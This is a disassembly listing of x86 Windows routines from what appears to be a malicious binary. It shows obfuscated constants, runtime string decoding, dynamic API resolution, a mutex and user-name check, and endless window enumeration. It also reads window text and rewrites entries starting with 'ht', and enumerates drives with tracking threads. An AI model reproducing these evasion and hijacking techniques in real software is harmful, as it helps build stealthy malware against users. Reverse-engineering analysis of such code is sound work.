mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_43ACB6: ; CODE XREF: sub_43A58C+72F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43ACB6
mov [ebp+var_60EA8], eax
mov eax, dword_44C0AC
add eax, dword_44C0F4
sub eax, 8
mov [ebp+var_40E9C], eax
jmp loc_43AF1A
; ---------------------------------------------------------------------------
loc_43ACDC: ; CODE XREF: sub_43A58C+99A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44C254
add edx, 17h
add edx, dword_44C168
cmp eax, edx
jz short loc_43AD04
and [ebp+var_60EAC], 0
loc_43AD04: ; CODE XREF: sub_43A58C+76F�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44C1C4
add edx, 13h
movsx ecx, word_44C150
add edx, ecx
cmp eax, edx
jnz loc_43AEC6
movsx eax, word_44C230
movsx edx, word_44C124
add eax, edx
sub eax, 0Ch
cmp [ebp+var_40E9C], eax
jbe loc_43ADFC
mov eax, [ebp+var_40E9C]
mov edx, dword_44C1B8
add edx, dword_44C25C
sub edx, 0Ch
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44C1A0
add edx, 1Dh
cmp eax, edx
jle short loc_43AD98
movsx edx, word_44C240
mov ecx, dword_44C224
lea edx, [edx+ecx+29h]
cmp eax, edx
jl short loc_43ADF2
loc_43AD98: ; CODE XREF: sub_43A58C+7F5�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44C164
add edx, 35h
add edx, dword_44C168
cmp eax, edx
jle short loc_43ADC0
movsx edx, word_44C260
add edx, 3Fh
cmp eax, edx
jl short loc_43ADF2
loc_43ADC0: ; CODE XREF: sub_43A58C+824�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44C1A4
mov ecx, dword_44C1E4
lea edx, [edx+ecx+6Fh]
cmp eax, edx
jle short loc_43ADFC
mov edx, dword_44C138
add edx, 76h
movsx ecx, word_44C24C
add edx, ecx
cmp eax, edx
jge short loc_43ADFC
loc_43ADF2: ; CODE XREF: sub_43A58C+80A�j
; sub_43A58C+832�j
mov [ebp+var_60EAC], 1
loc_43ADFC: ; CODE XREF: sub_43A58C+7B9�j
; sub_43A58C+84E�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_43AEC6
mov eax, [ebp+var_40E9C]
movsx edx, word_44C240
add edx, dword_44C200
sub edx, 6
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44C21C
add edx, 0Fh
add edx, dword_44C128
cmp eax, edx
jle short loc_43AE60
mov edx, dword_44C0D4
add edx, 26h
add edx, dword_44C270
cmp eax, edx
jl short loc_43AEBC
loc_43AE60: ; CODE XREF: sub_43A58C+8BF�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44C17C
add edx, 31h
movsx ecx, word_44C100
add edx, ecx
cmp eax, edx
jle short loc_43AE92
movsx edx, word_44C174
mov ecx, dword_44C1A8
lea edx, [edx+ecx+38h]
cmp eax, edx
jl short loc_43AEBC
loc_43AE92: ; CODE XREF: sub_43A58C+8EF�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44C0A0
add edx, 74h
movsx ecx, word_44C098
add edx, ecx
cmp eax, edx
jle short loc_43AEC6
mov edx, dword_44C200
add edx, 7Ah
cmp eax, edx
jge short loc_43AEC6
loc_43AEBC: ; CODE XREF: sub_43A58C+8D2�j
; sub_43A58C+904�j
mov [ebp+var_60EAC], 1
loc_43AEC6: ; CODE XREF: sub_43A58C+79A�j
; sub_43A58C+87C�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_43AEEF
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_43AEEF: ; CODE XREF: sub_43A58C+941�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44C1CC
add edx, 1Ah
cmp eax, edx
jnz short loc_43AF14
mov [ebp+var_60EAC], 1
loc_43AF14: ; CODE XREF: sub_43A58C+97C�j
inc [ebp+var_40E9C]
loc_43AF1A: ; CODE XREF: sub_43A58C+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_43ACDC
mov eax, [ebp+var_60EB4]
mov edx, dword_44C0F4
add edx, dword_44C138
sub edx, 7
mov [ebp+eax+var_50E9B], dl
loc_43AF48: ; CODE XREF: sub_43A58C+4FD�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43AF54: ; CODE XREF: sub_43A58C+4D9�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push offset dword_44DA88
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C158
sub eax, 9
cmp ebx, eax
jnz loc_43B268
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word_44C174
movsx edx, word_44C264
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz loc_43B25C
mov eax, dword_44C0AC
dec eax
mov [ebp-50EA0h], eax
jmp loc_43B24A
; ---------------------------------------------------------------------------
loc_43AFCA: ; CODE XREF: sub_43A58C+CCA�j
mov eax, dword_44C1AC
sub eax, 5
push eax
call ds:dword_44B630
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, dword_44C1E8
movsx edx, word_44C150
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_43B244
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push offset dword_44DA78
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44C128
sub eax, 9
cmp ebx, eax
jnz loc_43B238
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44C168
add eax, dword_44C280
sub eax, 4
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_43B0AE
cmp [ebp+var_60EF0], 8
jz short loc_43B0B3
loc_43B0AE: ; CODE XREF: sub_43A58C+B16�j
jmp loc_43B22C
; ---------------------------------------------------------------------------
loc_43B0B3: ; CODE XREF: sub_43A58C+B20�j
movsx eax, word_44C22C
add eax, dword_44C140
movsx edx, word_44C180
sub edx, 4
mov byte ptr [ebp+eax+var_70F00+1], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_43E434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call ds:dword_44BBA0
mov eax, dword_44C1E8
movsx edx, word_44C0BC
add eax, edx
movsx eax, [ebp+eax+var_70EF9]
mov edx, dword_44C1F4
add edx, dword_44C1F8
sub edx, 7
cmp eax, edx
jz loc_43B22C
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_43FB8B
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44C254
movsx edx, word_44C1DC
add eax, edx
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44C158
mov edx, dword_44C198
sub edx, 2
mov byte ptr [ebp+eax+var_71F10], dl
or ebx, ebx
jnz short loc_43B1B7
cmp [ebp+var_60EF0], 8
jnz short loc_43B1B7
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_43E434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call ds:dword_44BBA0
loc_43B1B7: ; CODE XREF: sub_43A58C+BF5�j
; sub_43A58C+BFF�j
push offset byte_44D957
call sub_43E507
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44B634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
push offset word_44D952
call sub_43E507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446020
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
add esp, 34h
loc_43B22C: ; CODE XREF: sub_43A58C:loc_43B0AE�j
; sub_43A58C+B96�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B238: ; CODE XREF: sub_43A58C+AE4�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B244: ; CODE XREF: sub_43A58C+AAF�j
inc dword ptr [ebp-50EA0h]
loc_43B24A: ; CODE XREF: sub_43A58C+A39�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_43AFCA
loc_43B25C: ; CODE XREF: sub_43A58C+A27�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B268: ; CODE XREF: sub_43A58C+9F7�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, dword_44C1EC
sub edx, 8
cmp eax, edx
jz short loc_43B2CF
push offset dword_44D94C
call sub_43E507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446020
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446020
push offset byte_44D947
call sub_43E507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446020
add esp, 20h
loc_43B2CF: ; CODE XREF: sub_43A58C+46F�j
; sub_43A58C+CFA�j
inc [ebp+var_30E50]
loc_43B2D5: ; CODE XREF: sub_43A58C+3F9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_43A98A
loc_43B2E7: ; CODE XREF: sub_43A58C+28D�j
; sub_43A58C+30D�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_43A7D4
lea eax, [ebp+var_30D40]
push eax
call ds:dword_44B62C
pop ecx
push [ebp+var_30E44]
call ds:dword_44BBA0
push [ebp+var_30E48]
call ds:dword_44BBA0
loc_43B325: ; CODE XREF: sub_43A58C+1EE�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B331: ; CODE XREF: sub_43A58C+1C7�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B33D: ; CODE XREF: sub_43A58C+1A4�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B349: ; CODE XREF: sub_43A58C+C7�j
; sub_43A58C:loc_43A6A7�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43B355: ; CODE XREF: sub_43A58C+61�j
; sub_43A58C+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_43A58C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B35A proc near ; CODE XREF: sub_43CBE3+94�p
; sub_43CBE3+CE�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_43B39B
cmp al, 79h
jz short loc_43B39B
cmp al, 75h
jz short loc_43B39B
cmp al, 69h
jz short loc_43B39B
cmp al, 6Fh
jz short loc_43B39B
cmp al, 61h
jnz short loc_43B39F
loc_43B39B: ; CODE XREF: sub_43B35A+2B�j
; sub_43B35A+2F�j ...
add [ebp+arg_0], 1
loc_43B39F: ; CODE XREF: sub_43B35A+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_43B3A9
add [ebp+arg_0], 1
loc_43B3A9: ; CODE XREF: sub_43B35A+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_43B35A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B3B1 proc near ; CODE XREF: sub_43D912+61�p
var_100C = byte ptr -100Ch
var_1004 = byte ptr -1004h
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444F6C
push ebx
push esi
push edi
push offset byte_44D935
call sub_43E507
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call ds:dword_44B63C ; FindWindowExA
mov edi, eax
or edi, edi
jnz short loc_43B3E3
mov edi, [ebp+arg_0]
loc_43B3E3: ; CODE XREF: sub_43B3B1+2D�j
push offset byte_44D91F
call sub_43E507
pop ecx
push 0
push eax
push 0
push edi
call ds:dword_44B63C ; FindWindowExA
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call ds:dword_446014 ; SendMessageA
movsx eax, word_44C1B4
add eax, dword_44C188
cmp [ebp+eax+var_1003], 20h
jnz short loc_43B441
mov eax, dword_44C194
add eax, dword_44C1C4
cmp [ebp+eax+var_100C], 20h
jz loc_43B4D8
loc_43B441: ; CODE XREF: sub_43B3B1+75�j
mov eax, dword_44C0C8
cmp [ebp+eax+var_FFF], 68h
jnz short loc_43B467
movsx eax, word_44C230
add eax, dword_44C188
cmp [ebp+eax+var_1004], 74h
jz short loc_43B4D8
loc_43B467: ; CODE XREF: sub_43B3B1+9D�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_43B470: ; CODE XREF: sub_43B3B1+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43B470
mov ebx, dword_44C274
add ebx, 0Ch
cmp eax, ebx
jb short loc_43B4D8
push offset word_44D91A
call sub_43E507
mov esi, dword_44C128
sub esi, 5
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_43A4B5
add esp, 10h
movsx ebx, word_44C1A4
add ebx, 0FFF8h
cmp eax, ebx
jnz short loc_43B4D8
push offset dword_44D914
call sub_43E507
pop ecx
push eax
mov esi, dword_44C214
sub esi, 9
push esi
push 0Ch
push edi
call ds:dword_446014 ; SendMessageA
loc_43B4D8: ; CODE XREF: sub_43B3B1+8A�j
; sub_43B3B1+B4�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43B3B1 endp
; =============== S U B R O U T I N E =======================================
sub_43B4DD proc near ; CODE XREF: sub_440C0A+1B�p
push edi
push offset dword_44D904
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2A8, eax
test eax, eax
jnz short loc_43B510
push offset dword_44D8F4
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2A8, eax
loc_43B510: ; CODE XREF: sub_43B4DD+1A�j
push offset word_44D8E2
call sub_43E507
push eax
push dword_44C2A8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446044, eax
push offset byte_44D8D1
call sub_43E507
push eax
push dword_44C2A8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BBA0, eax
push offset byte_44D8C1
call sub_43E507
push eax
push dword_44C2A8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44BBB0, eax
push offset word_44D8B2
call sub_43E507
push eax
push dword_44C2A8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_446038, eax
push offset word_44D8A2
call sub_43E507
add esp, 14h
push eax
push dword_44C2A8
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_449254, eax
pop edi
retn
sub_43B4DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B5A1 proc near ; DATA XREF: .data:0044C378�o
push ebp
mov ebp, esp
push offset dword_44BBA8
call ds:dword_448A3C ; InterlockedIncrement
mov eax, ds:dword_44BBA8
pop ebp
retn 4
sub_43B5A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B5B8 proc near ; DATA XREF: .data:off_44C374�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44DAC8
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43B5E4
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B62C
; ---------------------------------------------------------------------------
loc_43B5E4: ; CODE XREF: sub_43B5B8+1A�j
push offset dword_44DA48
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43B604
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B62C
; ---------------------------------------------------------------------------
loc_43B604: ; CODE XREF: sub_43B5B8+3A�j
push offset dword_44DA18
push esi
call ds:dword_44B648
or eax, eax
jz short loc_43B624
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43B62C
; ---------------------------------------------------------------------------
loc_43B624: ; CODE XREF: sub_43B5B8+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43B62C: ; CODE XREF: sub_43B5B8+2A�j
; sub_43B5B8+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_43B5B8 endp
; =============== S U B R O U T I N E =======================================
sub_43B633 proc near ; DATA XREF: .data:0044C3AC�o
mov eax, 80004001h
retn 18h
sub_43B633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43B63B proc near ; DATA XREF: sub_43B9CB+154�o
var_A = byte ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+arg_0]
push offset sub_43D490
push dword ptr fs:0
mov fs:0, esp
push offset word_44D89A
call sub_43E507
push dword ptr [edi]
push eax
lea esi, [ebp+var_A]
push esi
call ds:dword_44B634
add esp, 10h
loc_43B671: ; CODE XREF: sub_43B63B+5B�j
push 0
push dword ptr [edi]
lea eax, [ebp+var_A]
push eax
call sub_43F357
mov eax, dword_44C23C
add eax, dword_44C108
sub eax, 0Bh
push eax
call ds:dword_44B630
add esp, 10h
jmp short loc_43B671
sub_43B63B endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_43B69E proc near ; CODE XREF: sub_440C0A+25�p
push edi
push offset dword_44D88C
call sub_43E507
pop ecx
push eax
call ds:dword_4485E8 ; GetModuleHandleA
mov dword_44C2B0, eax
test eax, eax
jnz short loc_43B6D1
push offset asc_44D87E ; "\n"
call sub_43E507
pop ecx
push eax
call ds:dword_449244 ; LoadLibraryA
mov dword_44C2B0, eax
loc_43B6D1: ; CODE XREF: sub_43B69E+1A�j
cmp dword_44C2B0, 0
jz short loc_43B6F4
mov eax, dword_44C248
add eax, 5
push eax
push dword_44C2B0
call ds:dword_4481F8 ; GetProcAddress
mov ds:dword_44601C, eax
loc_43B6F4: ; CODE XREF: sub_43B69E+3A�j
pop edi
retn
sub_43B69E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B6F6 proc near ; CODE XREF: sub_440C0A:loc_440C45�p
; sub_44283E+261�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
movsx eax, word_44C150
mov edi, eax
add edi, dword_44C0B8
sub edi, 9
jmp short loc_43B784
; ---------------------------------------------------------------------------
loc_43B715: ; CODE XREF: sub_43B6F6+A1�j
push offset word_44D872
call sub_43E507
mov [ebp+var_108], eax
push offset dword_44D868
call sub_43E507
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call ds:dword_44B634
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call ds:dword_44A648 ; OpenMutexA
mov [ebp+var_104], eax
or eax, eax
jz short loc_43B783
push eax
call ds:dword_44A654 ; CloseHandle
mov eax, dword_44C0B8
dec eax
cmp edi, eax
jnz short loc_43B77C
xor eax, eax
inc eax
jmp short loc_43B79F
; ---------------------------------------------------------------------------
loc_43B77C: ; CODE XREF: sub_43B6F6+7F�j
mov eax, 2
jmp short loc_43B79F
; ---------------------------------------------------------------------------
loc_43B783: ; CODE XREF: sub_43B6F6+6E�j
inc edi
loc_43B784: ; CODE XREF: sub_43B6F6+1D�j
mov eax, dword_44C234
add eax, 5Ch
movsx edx, word_44C178
add eax, edx
cmp edi, eax
jb loc_43B715
xor eax, eax
loc_43B79F: ; CODE XREF: sub_43B6F6+84�j
; sub_43B6F6+8B�j
pop edi
pop esi
leave
retn
sub_43B6F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B7A3 proc near ; CODE XREF: sub_440C0A+34�p
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
mov [ebp+var_104], 0FFh
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_FF]
push eax
call ds:dword_4485F0 ; GetUserNameA
push offset word_44D85E
call sub_43E507
mov edi, dword_44C138
add edi, dword_44C0DC
sub edi, 2
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_43A4B5
add esp, 10h
movsx esi, word_44C1F0
add esi, 0FFFCh
cmp eax, esi
jz short loc_43B80C
xor eax, eax
inc eax
jmp short loc_43B853
; ---------------------------------------------------------------------------
loc_43B80C: ; CODE XREF: sub_43B7A3+62�j
push offset word_44D852
call sub_43E507
mov edi, dword_44C1D0
add edi, dword_44C0A0
sub edi, 0Ah
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_43A4B5
add esp, 10h
mov esi, dword_44C258
add esi, 0FFF9h
add esi, dword_44C270
cmp eax, esi
jz short loc_43B851
xor eax, eax
inc eax
jmp short loc_43B853
; ---------------------------------------------------------------------------
loc_43B851: ; CODE XREF: sub_43B7A3+A7�j
xor eax, eax
loc_43B853: ; CODE XREF: sub_43B7A3+67�j
; sub_43B7A3+AC�j
pop edi
pop esi
leave
retn
sub_43B7A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B857 proc near ; DATA XREF: .data:0044C3B0�o
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44C27C
add eax, 0C4h
cmp [ebp+arg_4], eax
jnz loc_43B986
mov [ebp+var_18], 3
lea eax, [ebp+var_10]
push eax
mov eax, dword_44C394
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp+var_4], eax
movsx eax, word_44C27C
add eax, dword_44C0B4
sub eax, 0Ch
cmp [ebp+var_4], eax
jnz loc_43B982
dec [ebp+var_10]
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44C394
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp+var_4], eax
mov eax, dword_44C26C
sub eax, 9
cmp [ebp+var_4], eax
jnz loc_43B982
lea eax, [ebp+var_20]
push eax
push offset dword_44DAD8
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44C254
add eax, dword_44C224
sub eax, 0Eh
cmp [ebp+var_4], eax
jnz short loc_43B979
lea eax, off_44C390
mov [ebp+var_8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp+var_24]
push eax
push offset dword_44DA18
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44C0A0
sub eax, 4
cmp [ebp+var_4], eax
jnz short loc_43B967
lea eax, [ebp+var_2C]
push eax
push offset dword_44DA18
push [ebp+var_24]
push [ebp+var_20]
call sub_44163D
add esp, 10h
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43B967: ; CODE XREF: sub_43B857+EB�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, [ebp+var_20]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43B979: ; CODE XREF: sub_43B857+B6�j
mov eax, [ebp+var_1C]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_43B982: ; CODE XREF: sub_43B857+50�j
; sub_43B857+86�j
xor eax, eax
jmp short loc_43B98B
; ---------------------------------------------------------------------------
loc_43B986: ; CODE XREF: sub_43B857+1F�j
mov eax, 80020003h
loc_43B98B: ; CODE XREF: sub_43B857+12D�j
pop edi
pop esi
pop ebx
leave
retn 24h
sub_43B857 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43B992 proc near ; DATA XREF: sub_43BB7B+117�o
push ebp
mov ebp, esp
loc_43B995: ; CODE XREF: sub_43B992+33�j
movsx eax, word_44C27C
sub eax, 4
push eax
call ds:dword_44B630
pop ecx
movsx eax, word_44C218
add eax, dword_44C1AC
sub eax, 0Ah
push eax
push offset sub_43D912
push 0
call ds:dword_446048 ; EnumDesktopWindows
jmp short loc_43B995
sub_43B992 endp
; ---------------------------------------------------------------------------
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43B9CB proc near ; DATA XREF: sub_440C0A+2C7�o
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_E = byte ptr -0Eh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, 43h
jmp short loc_43B9E4
; ---------------------------------------------------------------------------
loc_43B9DB: ; CODE XREF: sub_43B9CB+1C�j
and ds:dword_44B790[esi*4], 0
inc esi
loc_43B9E4: ; CODE XREF: sub_43B9CB+E�j
cmp esi, 5Ah
jbe short loc_43B9DB
loc_43B9E9: ; CODE XREF: sub_43B9CB+192�j
mov edi, 43h
jmp loc_43BB44
; ---------------------------------------------------------------------------
loc_43B9F3: ; CODE XREF: sub_43B9CB+17C�j
mov eax, dword_44C1E8
dec eax
push eax
call ds:dword_44B630
push offset word_44D84A
call sub_43E507
push edi
push eax
lea ebx, [ebp+var_E]
push ebx
call ds:dword_44B634
add esp, 14h
cmp ds:dword_44B790[edi*4], 0
jz short loc_43BA5D
mov eax, dword_44C20C
sub eax, 6
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ds:dword_44B790[edi*4]
call ds:dword_44B650 ; GetExitCodeThread
cmp [ebp+var_14], 103h
jz short loc_43BA5D
push ds:dword_44B790[edi*4]
call ds:dword_44A654 ; CloseHandle
and ds:dword_44B790[edi*4], 0
loc_43BA5D: ; CODE XREF: sub_43B9CB+56�j
; sub_43B9CB+7B�j
lea eax, [ebp+var_E]
push eax
call ds:dword_44B668 ; GetDriveTypeA
mov [ebp+var_4], eax
cmp eax, 3
jz short loc_43BAA5
cmp eax, 4
jz short loc_43BAA5
cmp eax, 2
jz short loc_43BAA5
cmp ds:dword_44B790[edi*4], 0
jz loc_43BB43
mov ebx, dword_44C0F8
movsx edx, word_44C0E8
add ebx, edx
sub ebx, 8
mov ds:dword_448630[edi*4], ebx
jmp loc_43BB43
; ---------------------------------------------------------------------------
loc_43BAA5: ; CODE XREF: sub_43B9CB+A2�j
; sub_43B9CB+A7�j ...
push 1
call ds:dword_447000 ; SetErrorMode
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_E]
push eax
call ds:dword_4480D4 ; GetDiskFreeSpaceA
mov ebx, dword_44C134
sub ebx, 8
cmp eax, ebx
jnz short loc_43BAF1
cmp ds:dword_44B790[edi*4], 0
jz short loc_43BB43
movsx ebx, word_44C144
sub ebx, 6
